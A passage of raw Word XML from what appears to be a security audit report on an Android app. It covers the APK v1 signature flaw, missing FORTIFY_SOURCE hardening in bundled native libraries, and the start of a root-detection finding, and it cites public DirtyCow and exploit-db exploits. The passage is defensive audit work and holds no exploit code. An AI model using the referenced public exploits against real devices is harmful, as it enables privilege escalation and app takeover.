        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>assumed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>installed malicious app may trivially gain root privileges on those devices using public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:position w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="13"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>111112113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:position w:val="-7"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The existence of this flaw means that attackers could trick users into installing a malicious attacker-controlled APK which matches the v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>APK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>legitimate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487616000">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103034</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="79" name="Graphic 79"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="79" name="Graphic 79"/>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8.11294pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15700480;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape64" coordorigin="1440,162" coordsize="2880,0" path="m1440,162l4320,162e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId177">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://rules.sonarsource.com/typescript/RSPEC-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>2245</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId178">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-atta….affecting-their-signatures</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId179">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/35711</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId180">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/davidqphan/DirtyCow</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId181">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Dirty_COW</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Android application. As a result, a transparent update would be possible without warnings appearing in Android, effectively taking over the existing application and all of its data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to increase the minimum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>supported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>least</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Android 7) to ensure that this known vulnerability cannot be exploited on devices running older Android versions. In addition, future production builds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>signed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and greater APK signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250027" w:id="28"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-013</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that a number of binaries embedded into the Android application are currently not leveraging the available compiler flags to mitigate potential memory corruption vulnerabilities. This unnecessarily puts the application more at risk for such </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>D_FORTIFY_SOURCE=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Missing this flag means common libc functions are missing buffer overflow checks, so the application is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>corruption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>most binaries are affected, the following is a reduced list of examples for the sake of brevity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>decompiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>app):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="6049" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lib/armeabi-v7a/libcrypto.so lib/armeabi-v7a/libsqlcipher.so lib/x86_64/libsqlcipher.so lib/x86/libcrypto.so lib/x86/libsqlcipher.so lib/arm64-v8a/libsqlcipher.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-D_FORTIFY_SOURCE=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>argument so that common insecure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>glibc </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>functions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, etc. are automatically protected with buffer overflow checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250026" w:id="29"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Jailbreak/Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
